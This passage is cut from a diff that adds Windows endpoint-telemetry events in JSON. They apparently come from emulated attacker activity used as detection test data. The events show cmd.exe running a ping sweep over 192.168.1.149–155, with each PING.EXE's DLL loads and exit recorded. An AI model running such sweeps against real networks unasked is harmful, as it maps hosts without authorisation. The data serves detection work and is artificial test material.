"C:\\Windows\\System32\\winnsi.dll", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572706980000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572706980000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572706980000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" + }, + { + "event_type": "process", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572711840000, + "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.149", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 688, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572711980000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572711980000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" + }, + { + 
"event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572711980000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572711980000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572711980000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572711980000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572711980000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572711980000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 
688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572711980000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572711980000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572711980000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572711980000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" + }, + { + "event_type": "process", + "pid": 688, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572716990000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.150", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2388, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572717140000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": 
"PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572717140000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572717140000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572717140000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572717140000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572717140000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572717140000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2388, + "process_name": "PING.EXE", + 
"process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572717140000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572717140000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572717300000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572717300000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572717300000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" + }, + { + "event_type": "process", + "pid": 2388, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572721830000, + "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.151", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6428, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 
131883572721980000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572721980000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572721980000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572721980000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572721980000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572721980000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6428, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572721980000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572721980000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572721980000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572721980000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572721980000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572721980000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" + }, + { + "event_type": "process", + "pid": 6428, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572726840000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.152", 
+ "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6132, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572726980000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6132, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572726990000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6132, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572726990000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6132, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572726990000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6132, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572726990000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6132, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + 
"timestamp": 131883572726990000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6132, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572726990000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6132, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572726990000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6132, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572726990000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6132, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572726990000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6132, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572726990000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6132, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572726990000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" + }, + { + "event_type": "process", + 
"pid": 6132, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572731990000, + "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.153", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1988, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572732140000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572732140000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572732140000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572732140000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572732140000, + 
"unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572732140000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572732140000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572732140000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572732140000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572732140000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572732140000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + 
"image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572732140000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" + }, + { + "event_type": "process", + "pid": 1988, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572736830000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.154", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5184, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572736980000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572736980000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572736980000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572736980000, + "unique_pid": 
"{42FC7E13-CB99-5C05-0000-00108B0C5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572736980000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572736980000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572736980000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572736980000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572736980000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572736980000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + 
"image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572736980000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572736980000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" + }, + { + "event_type": "process", + "pid": 5184, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572741990000, + "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.155", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7216, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572742140000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572742140000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572742140000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" 
+ }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572742140000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572742140000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572742140000, + "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7216, + "process_name": 